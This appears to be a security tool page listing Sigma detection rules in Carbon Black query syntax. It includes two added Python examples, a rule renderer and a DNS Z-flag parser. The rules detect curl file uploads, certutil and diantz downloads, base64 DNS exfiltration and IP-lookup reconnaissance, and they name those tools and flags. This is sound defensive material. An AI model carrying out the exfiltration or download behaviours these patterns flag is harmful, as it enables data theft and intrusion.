Tool
EDR / XDR

VMware Carbon Black

1,440 rules · Sigma detections in VMware Carbon Black syntax
The same Sigma detection corpus, machine-rendered into VMware Carbon Black query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 3,646 rules (.zip, 1.2 MB) Every VMware Carbon Black query in this view, packaged to deploy.
Filter by technique (pick techniques from the ATT&CK matrix; counts per tactic):
Reconnaissance: 12
Resource Development: 10
Initial Access: 10
Execution: 30
Persistence: 42
Privilege Escalation: 20
Stealth: 79
Defense Impairment: 32
Credential Access: 35
Discovery: 33
Lateral Movement: 16
Collection: 20
Command and Control: 24
Exfiltration: 10
Impact: 18
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
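What "machine-rendered into Carbon Black syntax" means in practice is easiest to see by reproducing it. The following is an added example written for this page; it is not pySigma's Carbon Black backend and not code from this site. Everything it assumes is inferred from the rendered queries shown further down: the escape set (space, backslash, slash, colon, hyphen, parentheses), a trailing `*` for `contains` and `startswith` only (`endswith` and exact values render bare, which is consistent with a tokenised search), dotted field names in double quotes, regex values with backslashes doubled, `NOT` rendered as `-`, and parentheses around every compound sub-expression. The three `detection` sections are transcribed from the curl user-agent, curl upload and Microsoft 365 rules on this page; the dict form stands in for `yaml.safe_load` of the rule file.

```python
import fnmatch
import re

# Inferred from this page's rendered queries (an assumption of this example, not a pySigma spec).
_ESCAPE = set(' \\/:-()')
_TOKEN_RE = re.compile(r'\(|\)|(?:1|all) of [\w*]+|[\w*]+')

def escape(value: str) -> str:
    return ''.join('\\' + c if c in _ESCAPE else c for c in value)

def _collapse(op, nodes):
    """A one-child AND/OR is just the child, so single-field selections get no parentheses."""
    return nodes[0] if len(nodes) == 1 else (op, nodes)

def _leaf(field, mods, value):
    name = f'"{field}"' if '.' in field else field            # dotted Zeek fields are quoted
    if 're' in mods:                                            # regex: only backslashes doubled
        return ('leaf', name + ':' + str(value).replace('\\', '\\\\'))
    text = escape(str(value))
    if 'contains' in mods or 'startswith' in mods:              # trailing wildcard only;
        text += '*'                                             # endswith/exact render bare
    return ('leaf', f'{name}:{text}')

def _field(key, value):
    field, *mods = key.split('|')
    values = value if isinstance(value, list) else [value]
    return _collapse('and' if 'all' in mods else 'or', [_leaf(field, mods, v) for v in values])

def _selection(sel):
    if isinstance(sel, list):                                   # list of maps = OR of maps
        return _collapse('or', [_selection(s) for s in sel])
    return _collapse('and', [_field(k, v) for k, v in sel.items()])

def _parse(condition, selections):
    """Recursive descent over the condition: or < and < not; '1 of x*' / 'all of x*' expand by glob."""
    tokens, pos = _TOKEN_RE.findall(condition), 0

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def parse_or():
        items = [parse_and()]
        while pos < len(tokens) and tokens[pos] == 'or':
            take()
            items.append(parse_and())
        return _collapse('or', items)

    def parse_and():
        items = [parse_not()]
        while pos < len(tokens) and tokens[pos] == 'and':
            take()
            items.append(parse_not())
        return _collapse('and', items)

    def parse_not():
        tok = take()
        if tok == 'not':
            return ('not', parse_not())
        if tok == '(':
            node = parse_or()
            take()                                              # closing ')'
            return node
        if ' of ' in tok:
            quant, pattern = tok.split(' of ')
            matched = [_selection(selections[n]) for n in selections if fnmatch.fnmatchcase(n, pattern)]
            return _collapse('or' if quant == '1' else 'and', matched)
        return _selection(selections[tok])

    return parse_or()

def _render(node, nested=False):
    kind, payload = node
    if kind == 'leaf':
        return payload
    if kind == 'not':
        text = '-' + _render(payload, nested=True)
    else:
        text = (' OR ' if kind == 'or' else ' ').join(_render(c, nested=True) for c in payload)
    return f'({text})' if nested else text                     # every compound child gets parens

def to_carbon_black(detection: dict) -> str:
    """Render a Sigma 'detection' mapping (named selections plus 'condition') to the page's syntax."""
    selections = {k: v for k, v in detection.items() if k != 'condition'}
    return _render(_parse(detection['condition'], selections))

# Transcribed from rules on this page (a real run would yaml.safe_load the rule file instead).
CURL_USER_AGENT = {'selection': {'Image|endswith': '/curl', 'CommandLine|contains': [' -A ', ' --user-agent ']},
                   'condition': 'selection'}
CURL_UPLOAD = {'selection_img': {'Image|endswith': '/curl'},
               'selection_cli': [{'CommandLine|contains': [' --form', ' --upload-file ', ' --data ', ' --data-']},
                                 {'CommandLine|re': r'\s-[FTd]\s'}],
               'filter_optional_localhost': {'CommandLine|contains': ['://localhost', '://127.0.0.1']},
               'condition': 'all of selection_* and not 1 of filter_optional_*'}
M365_DELIVERED = {'selection': {'Workload': 'ThreatIntelligence', 'Operation': 'TIMailData', 'Directionality': 'Inbound'},
                  'filter_main_blocked': {'DeliveryAction': 'Blocked'},
                  'condition': 'selection and not 1 of filter_main_*'}

if __name__ == '__main__':
    for rule in (CURL_USER_AGENT, CURL_UPLOAD, M365_DELIVERED):
        print(to_carbon_black(rule))
```

The output for the three rules is identical to the queries shown in their cards below, which is the check worth running before trusting any renderer: diff its output against a query you have already validated, and pay attention to the `endswith` case, since a value that renders bare relies on the platform's tokenisation to behave like a suffix match.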

Detection rules

50 shown of 1,440
Level: medium · Quality tier: Moderate · Alert volume: Medium FP
Suspicious Curl Change User Agents - Linux
Detects a suspicious curl process start on linux with set useragent options
Status: test · Author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: b86d356d-6093-443d-971c-9b07db583c68
carbon_black query
Image:\/curl (CommandLine:\ \-A\ * OR CommandLine:\ \-\-user\-agent\ *)
view Sigma YAML
title: Suspicious Curl Change User Agents - Linux
id: b86d356d-6093-443d-971c-9b07db583c68
related:
    - id: 3286d37a-00fd-41c2-a624-a672dcd34e60
      type: derived
status: test
description: Detects a suspicious curl process start on linux with set useragent options
references:
    - https://curl.se/docs/manpage.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
    - attack.command-and-control
    - attack.t1071.001
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/curl'
        CommandLine|contains:
            - ' -A '
            - ' --user-agent '
    condition: selection
falsepositives:
    - Scripts created by developers and admins
    - Administrative activity
level: medium
Level: medium · Quality tier: Strong · Alert volume: Medium FP
Suspicious Curl File Upload - Linux
Detects a suspicious curl process start that adds a file to a web request
Status: test · Author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) · ATT&CK mapping: technique · Rule id: 00b90cc1-17ec-402c-96ad-3a8117d7a582
carbon_black query
(Image:\/curl ((CommandLine:\ \-\-form* OR CommandLine:\ \-\-upload\-file\ * OR CommandLine:\ \-\-data\ * OR CommandLine:\ \-\-data\-*) OR CommandLine:\\s-[FTd]\\s)) (-(CommandLine:\:\/\/localhost* OR CommandLine:\:\/\/127.0.0.1*))
view Sigma YAML
title: Suspicious Curl File Upload - Linux
id: 00b90cc1-17ec-402c-96ad-3a8117d7a582
related:
    - id: 00bca14a-df4e-4649-9054-3f2aa676bc04
      type: derived
status: test
description: Detects a suspicious curl process start the adds a file to a web request
references:
    - https://twitter.com/d1r4c/status/1279042657508081664
    - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
    - https://curl.se/docs/manpage.html
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
date: 2022-09-15
modified: 2023-05-02
tags:
    - attack.exfiltration
    - attack.command-and-control
    - attack.t1567
    - attack.t1105
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|endswith: '/curl'
    selection_cli:
        - CommandLine|contains:
              - ' --form' # Also covers the "--form-string"
              - ' --upload-file '
              - ' --data '
              - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
        - CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
    filter_optional_localhost:
        CommandLine|contains:
            - '://localhost'
            - '://127.0.0.1'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - Scripts created by developers and admins
level: medium
Level: medium · Quality tier: Strong · Alert volume: Medium FP
Suspicious DNS Query for IP Lookup Service APIs
Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process.
Status: test · Author: Brandon George (blog post), Thomas Patzke · ATT&CK mapping: technique · Rule id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2
carbon_black query
((QueryName:www.ip.cn OR QueryName:l2.io) OR (QueryName:api.2ip.ua* OR QueryName:api.bigdatacloud.net* OR QueryName:api.ipify.org* OR QueryName:bot.whatismyipaddress.com* OR QueryName:canireachthe.net* OR QueryName:checkip.amazonaws.com* OR QueryName:checkip.dyndns.org* OR QueryName:curlmyip.com* OR QueryName:db\-ip.com* OR QueryName:edns.ip\-api.com* OR QueryName:eth0.me* OR QueryName:freegeoip.app* OR QueryName:geoipy.com* OR QueryName:getip.pro* OR QueryName:icanhazip.com* OR QueryName:ident.me* OR QueryName:ifconfig.io* OR QueryName:ifconfig.me* OR QueryName:ip\-api.com* OR QueryName:ip.360.cn* OR QueryName:ip.anysrc.net* OR QueryName:ip.taobao.com* OR QueryName:ip.tyk.nu* OR QueryName:ipaddressworld.com* OR QueryName:ipapi.co* OR QueryName:ipconfig.io* OR QueryName:ipecho.net* OR QueryName:ipinfo.io* OR QueryName:ipip.net* OR QueryName:ipof.in* OR QueryName:ipv4.icanhazip.com* OR QueryName:ipv4bot.whatismyipaddress.com* OR QueryName:ipv6\-test.com* OR QueryName:ipwho.is* OR QueryName:jsonip.com* OR QueryName:myexternalip.com* OR QueryName:seeip.org* OR QueryName:wgetip.com* OR QueryName:whatismyip.akamai.com* OR QueryName:whois.pconline.com.cn* OR QueryName:wtfismyip.com*)) (-(Image:\\brave.exe OR (Image:C\:\\Program\ Files\\Google\\Chrome\\Application\\chrome.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Google\\Chrome\\Application\\chrome.exe) OR (Image:C\:\\Program\ Files\\Mozilla\ Firefox\\firefox.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Mozilla\ Firefox\\firefox.exe) OR (Image:C\:\\Program\ Files\ \(x86\)\\Internet\ Explorer\\iexplore.exe OR Image:C\:\\Program\ Files\\Internet\ Explorer\\iexplore.exe) OR Image:\\maxthon.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeWebView\\Application\\* OR Image:\\WindowsApps\\MicrosoftEdge.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\Edge\\Application\\msedge.exe OR Image:C\:\\Program\ Files\\Microsoft\\Edge\\Application\\msedge.exe)) OR ((Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeCore\\* OR Image:C\:\\Program\ Files\\Microsoft\\EdgeCore\\*) (Image:\\msedge.exe OR Image:\\msedgewebview2.exe)) OR Image:\\opera.exe OR Image:\\safari.exe OR Image:\\seamonkey.exe OR Image:\\vivaldi.exe OR Image:\\whale.exe))
view Sigma YAML
title: Suspicious DNS Query for IP Lookup Service APIs
id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2
status: test
description: Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process.
references:
    - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon
    - https://twitter.com/neonprimetime/status/1436376497980428318
    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
author: Brandon George (blog post), Thomas Patzke
date: 2021-07-08
modified: 2024-03-22
tags:
    - attack.reconnaissance
    - attack.t1590
logsource:
    product: windows
    category: dns_query
detection:
    selection:
        - QueryName:
              - 'www.ip.cn'
              - 'l2.io'
        - QueryName|contains:
              - 'api.2ip.ua'
              - 'api.bigdatacloud.net'
              - 'api.ipify.org'
              - 'bot.whatismyipaddress.com'
              - 'canireachthe.net'
              - 'checkip.amazonaws.com'
              - 'checkip.dyndns.org'
              - 'curlmyip.com'
              - 'db-ip.com'
              - 'edns.ip-api.com'
              - 'eth0.me'
              - 'freegeoip.app'
              - 'geoipy.com'
              - 'getip.pro'
              - 'icanhazip.com'
              - 'ident.me'
              - 'ifconfig.io'
              - 'ifconfig.me'
              - 'ip-api.com'
              - 'ip.360.cn'
              - 'ip.anysrc.net'
              - 'ip.taobao.com'
              - 'ip.tyk.nu'
              - 'ipaddressworld.com'
              - 'ipapi.co'
              - 'ipconfig.io'
              - 'ipecho.net'
              - 'ipinfo.io'
              - 'ipip.net'
              - 'ipof.in'
              - 'ipv4.icanhazip.com'
              - 'ipv4bot.whatismyipaddress.com'
              - 'ipv6-test.com'
              - 'ipwho.is'
              - 'jsonip.com'
              - 'myexternalip.com'
              - 'seeip.org'
              - 'wgetip.com'
              - 'whatismyip.akamai.com'
              - 'whois.pconline.com.cn'
              - 'wtfismyip.com'
    filter_optional_brave:
        Image|endswith: '\brave.exe'
    filter_optional_chrome:
        Image:
            - 'C:\Program Files\Google\Chrome\Application\chrome.exe'
            - 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
    filter_optional_firefox:
        Image:
            - 'C:\Program Files\Mozilla Firefox\firefox.exe'
            - 'C:\Program Files (x86)\Mozilla Firefox\firefox.exe'
    filter_optional_ie:
        Image:
            - 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
            - 'C:\Program Files\Internet Explorer\iexplore.exe'
    filter_optional_maxthon:
        Image|endswith: '\maxthon.exe'
    filter_optional_edge_1:
        - Image|startswith: 'C:\Program Files (x86)\Microsoft\EdgeWebView\Application\'
        - Image|endswith: '\WindowsApps\MicrosoftEdge.exe'
        - Image:
              - 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
              - 'C:\Program Files\Microsoft\Edge\Application\msedge.exe'
    filter_optional_edge_2:
        Image|startswith:
            - 'C:\Program Files (x86)\Microsoft\EdgeCore\'
            - 'C:\Program Files\Microsoft\EdgeCore\'
        Image|endswith:
            - '\msedge.exe'
            - '\msedgewebview2.exe'
    filter_optional_opera:
        Image|endswith: '\opera.exe'
    filter_optional_safari:
        Image|endswith: '\safari.exe'
    filter_optional_seamonkey:
        Image|endswith: '\seamonkey.exe'
    filter_optional_vivaldi:
        Image|endswith: '\vivaldi.exe'
    filter_optional_whale:
        Image|endswith: '\whale.exe'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Legitimate usage of IP lookup services such as ipify API
level: medium
Level: medium · Quality tier: Moderate · Alert volume: High FP
Suspicious DNS Query with B64 Encoded String
Detects suspicious DNS queries using base64 encoding
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: 4153a907-2451-4e4f-a578-c52bb6881432
carbon_black query
query:==.*
view Sigma YAML
title: Suspicious DNS Query with B64 Encoded String
id: 4153a907-2451-4e4f-a578-c52bb6881432
status: test
description: Detects suspicious DNS queries using base64 encoding
references:
    - https://github.com/krmaxwell/dns-exfiltration
author: Florian Roth (Nextron Systems)
date: 2018-05-10
modified: 2022-10-09
tags:
    - attack.exfiltration
    - attack.t1048.003
    - attack.command-and-control
    - attack.t1071.004
logsource:
    category: dns
detection:
    selection:
        query|contains: '==.'
    condition: selection
falsepositives:
    - Unknown
level: medium
Level: medium · Quality tier: Strong · Alert volume: Medium FP
Suspicious DNS Z Flag Bit Set
The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'
Status: test · Author: @neu5ron, SOC Prime Team, Corelight · ATT&CK mapping: technique · Rule id: ede05abc-2c9e-4624-9944-9ff17fdc0bf5
carbon_black query
(-Z:0) query:.* (-((query:.arpa OR query:.local OR query:.ultradns.net OR query:.twtrdns.net OR query:.azuredns\-prd.info OR query:.azure\-dns.com OR query:.azuredns\-ff.info OR query:.azuredns\-ff.org OR query:.azuregov\-dns.org) OR (qtype_name:ns OR qtype_name:mx) OR answers:\\x00 OR ("id.resp_p":137 OR "id.resp_p":138 OR "id.resp_p":139)))
view Sigma YAML
title: Suspicious DNS Z Flag Bit Set
id: ede05abc-2c9e-4624-9944-9ff17fdc0bf5
status: test
description: |
    The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).
    Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.
    Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.
    Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.
    This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'
references:
    - https://twitter.com/neu5ron/status/1346245602502443009
    - https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma
    - https://tools.ietf.org/html/rfc2929#section-2.1
    - https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS
author: '@neu5ron, SOC Prime Team, Corelight'
date: 2021-05-04
modified: 2022-11-29
tags:
    - attack.t1095
    - attack.t1571
    - attack.command-and-control
logsource:
    product: zeek
    service: dns
detection:
    z_flag_unset:
        Z: 0
    most_probable_valid_domain:
        query|contains: '.'
    exclude_tlds:
        query|endswith:
            - '.arpa'
            - '.local'
            - '.ultradns.net'
            - '.twtrdns.net'
            - '.azuredns-prd.info'
            - '.azure-dns.com'
            - '.azuredns-ff.info'
            - '.azuredns-ff.org'
            - '.azuregov-dns.org'
    exclude_query_types:
        qtype_name:
            - 'ns'
            - 'mx'
    exclude_responses:
        answers|endswith: '\\x00'
    exclude_netbios:
        id.resp_p:
            - 137
            - 138
            - 139
    condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios)
falsepositives:
    - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.'
    - 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"'
level: medium
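The rule keys on a single header field, so it helps to see where that field comes from and why DNSSEC traffic trips it. The following is an added example written for this page, not code from the Sigma rule, Zeek or the Corelight guide. It decodes the 16-bit flags word of a raw DNS header (RFC 1035 section 4.1.1, with the Z bit as RFC 2929 section 2.1 reserves it), builds a Zeek-style record from a query, and applies the rule's condition to it. One assumption is labelled in the code: that Zeek's dns.log `Z` column reports the original three reserved bits (Z, AD and CD, i.e. `(flags & 0x0070) >> 4`) as one value, which is the reading under which a DNSSEC-validated answer with AD set shows up as `Z != 0`, exactly the false positive the rule documents. The packets are constructed inline; `answers|endswith` is omitted because a query carries no answers.

```python
import struct

QTYPE_NAMES = {1: 'a', 2: 'ns', 15: 'mx', 28: 'aaaa'}      # subset, enough for the samples
NETBIOS_PORTS = (137, 138, 139)
EXCLUDED_SUFFIXES = ('.arpa', '.local', '.ultradns.net', '.twtrdns.net', '.azuredns-prd.info',
                     '.azure-dns.com', '.azuredns-ff.info', '.azuredns-ff.org', '.azuregov-dns.org')

def parse_flags(flags: int) -> dict:
    """Split the header flags word: QR|Opcode(4)|AA|TC|RD|RA|Z|AD|CD|RCODE(4), MSB first."""
    return {
        'qr': flags >> 15 & 1, 'opcode': flags >> 11 & 0xF,
        'aa': flags >> 10 & 1, 'tc': flags >> 9 & 1, 'rd': flags >> 8 & 1, 'ra': flags >> 7 & 1,
        'z_bit': flags >> 6 & 1,                 # the one bit RFC 2929 still reserves
        'ad': flags >> 5 & 1, 'cd': flags >> 4 & 1,   # DNSSEC bits carved out of the old Z field
        'zeek_z': (flags & 0x0070) >> 4,         # ASSUMED Zeek dns.log 'Z': Z|AD|CD as one value
        'rcode': flags & 0xF,
    }

def parse_query(packet: bytes) -> dict:
    """Header plus first question of a DNS query (queries do not use label compression)."""
    ident, flags, qdcount, _an, _ns, _ar = struct.unpack('!HHHHHH', packet[:12])
    labels, offset = [], 12
    while packet[offset]:                        # length-prefixed labels up to the 0x00 root
        length = packet[offset]
        labels.append(packet[offset + 1:offset + 1 + length].decode('ascii'))
        offset += 1 + length
    qtype, _qclass = struct.unpack('!HH', packet[offset + 1:offset + 5])
    return {'id': ident, 'qdcount': qdcount, 'query': '.'.join(labels),
            'qtype_name': QTYPE_NAMES.get(qtype, str(qtype)), **parse_flags(flags)}

def build_query(ident: int, flags: int, qname: str, qtype: int = 1) -> bytes:
    """Constructed one-question DNS message used as sample input for this example."""
    labels = b''.join(bytes([len(p)]) + p.encode('ascii') for p in qname.rstrip('.').split('.'))
    return struct.pack('!HHHHHH', ident, flags, 1, 0, 0, 0) + labels + b'\x00' + struct.pack('!HH', qtype, 1)

def z_flag_rule(rec: dict, resp_port: int = 53) -> bool:
    """The rule's condition over a Zeek-like record: Z set, a dotted name, none of the exclusions."""
    if rec['zeek_z'] == 0 or '.' not in rec['query']:
        return False
    if rec['query'].endswith(EXCLUDED_SUFFIXES) or rec['qtype_name'] in ('ns', 'mx'):
        return False
    return resp_port not in NETBIOS_PORTS        # exclude_netbios; exclude_responses not applicable

# Constructed samples: a normal recursive query, a query with the reserved bit set,
# a DNSSEC-validated answer header (AD set), and an MX lookup with the reserved bit set.
NORMAL = build_query(0x1234, 0x0100, 'example.com')      # RD only
Z_SET = build_query(0x1235, 0x0140, 'example.com')       # RD + reserved Z bit
AD_SET = build_query(0x1236, 0x81A0, 'example.com')      # QR RD RA AD
MX_Z_SET = build_query(0x1237, 0x0140, 'example.com', qtype=15)

if __name__ == '__main__':
    for pkt in (NORMAL, Z_SET, AD_SET, MX_Z_SET):
        rec = parse_query(pkt)
        print(rec['query'], rec['qtype_name'], 'Z=%d' % rec['zeek_z'],
              'alert' if z_flag_rule(rec) else 'ok')
```

`Z_SET` alerts on the genuinely reserved bit, `AD_SET` alerts only because the three-bit column folds AD in, and `MX_Z_SET` is suppressed by the query-type exclusion; when tuning, the AD case is what the "internal or legitimate external domains using DNSSec" false positive refers to, and excluding those domains by suffix is the intended fix.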
Level: medium · Quality tier: Moderate · Alert volume: High FP
Suspicious Diantz Alternate Data Stream Execution
Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
Status: test · Author: frack113 · ATT&CK mapping: sub-technique · Rule id: 6b369ced-4b1d-48f1-b427-fdc0de0790bd
carbon_black query
(CommandLine:diantz.exe* CommandLine:.cab*) CommandLine::[^\\\\]
view Sigma YAML
title: Suspicious Diantz Alternate Data Stream Execution
id: 6b369ced-4b1d-48f1-b427-fdc0de0790bd
status: test
description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/
author: frack113
date: 2021-11-26
modified: 2022-12-31
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - diantz.exe
            - .cab
        CommandLine|re: ':[^\\]'
    condition: selection
falsepositives:
    - Very Possible
level: medium
Level: medium · Quality tier: Moderate · Alert volume: High FP
Suspicious Diantz Download and Compress Into a CAB File
Download and compress a remote file and store it in a cab file on local machine.
Status: test · Author: frack113 · ATT&CK mapping: technique · Rule id: 185d7418-f250-42d0-b72e-0c8b70661e93
carbon_black query
CommandLine:diantz.exe* CommandLine:\ \\\\* CommandLine:.cab*
view Sigma YAML
title: Suspicious Diantz Download and Compress Into a CAB File
id: 185d7418-f250-42d0-b72e-0c8b70661e93
status: test
description: Download and compress a remote file and store it in a cab file on local machine.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/
author: frack113
date: 2021-11-26
modified: 2022-08-13
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - diantz.exe
            - ' \\\\'
            - '.cab'
    condition: selection
falsepositives:
    - Unknown
level: medium
Level: medium · Quality tier: Moderate · Alert volume: Low FP
Suspicious Digital Signature Of AppX Package
Detects execution of AppX packages with known suspicious or malicious signature
Status: test · Author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic only · Rule id: b5aa7d60-c17e-4538-97de-09029d6cd76b
carbon_black query
EventID:157 subjectName:CN=Foresee\ Consulting\ Inc.,\ O=Foresee\ Consulting\ Inc.,\ L=North\ York,\ S=Ontario,\ C=CA,\ SERIALNUMBER=1004913\-1,\ OID.1.3.6.1.4.1.311.60.2.1.3=CA,\ OID.2.5.4.15=Private\ Organization
view Sigma YAML
title: Suspicious Digital Signature Of AppX Package
id: b5aa7d60-c17e-4538-97de-09029d6cd76b
status: test
description: Detects execution of AppX packages with known suspicious or malicious signature
references:
    - Internal Research
    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-16
tags:
    - attack.execution
    - attack.stealth
logsource:
    product: windows
    service: appxpackaging-om
detection:
    selection:
        EventID: 157
        # Add more known suspicious/malicious certificates used in different attacks
        subjectName: 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization'
    condition: selection
falsepositives:
    - Unknown
level: medium
Level: medium · Quality tier: Strong · Alert volume: Medium FP
Suspicious Download Via Certutil.EXE
Detects the execution of certutil with certain flags that allow the utility to download files.
Status: test · Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · Rule id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b
carbon_black query
(Image:\\certutil.exe OR OriginalFileName:CertUtil.exe) (CommandLine:urlcache\ * OR CommandLine:verifyctl\ * OR CommandLine:URL\ *) CommandLine:http*
view Sigma YAML
title: Suspicious Download Via Certutil.EXE
id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b
related:
    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
      type: similar
status: test
description: Detects the execution of certutil with certain flags that allow the utility to download files.
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
    - https://twitter.com/egre55/status/1087685529016193025
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-15
modified: 2025-12-01
tags:
    - attack.stealth
    - attack.t1027
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certutil.exe'
        - OriginalFileName: 'CertUtil.exe'
    selection_flags:
        CommandLine|contains:
            - 'urlcache '
            - 'verifyctl '
            - 'URL '
    selection_http:
        CommandLine|contains: 'http'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/info.yml
Level: medium · Quality tier: Moderate · Alert volume: Medium FP
Suspicious Driver Install by pnputil.exe
Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
Status: test · Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger · ATT&CK mapping: technique · Rule id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1
carbon_black query
(CommandLine:\-i* OR CommandLine:\/install* OR CommandLine:\-a* OR CommandLine:\/add\-driver* OR CommandLine:.inf*) Image:\\pnputil.exe
view Sigma YAML
title: Suspicious Driver Install by pnputil.exe
id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1
status: test
description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
references:
    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax
    - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html
author: Hai Vaknin @LuxNoBulIshit, Avihay eldad  @aloneliassaf, Austin Songer @austinsonger
date: 2021-09-30
modified: 2022-10-09
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '-i'
            - '/install'
            - '-a'
            - '/add-driver'
            - '.inf'
        Image|endswith: '\pnputil.exe'
    condition: selection
falsepositives:
    - Pnputil.exe being used may be performed by a system administrator.
    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
    - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
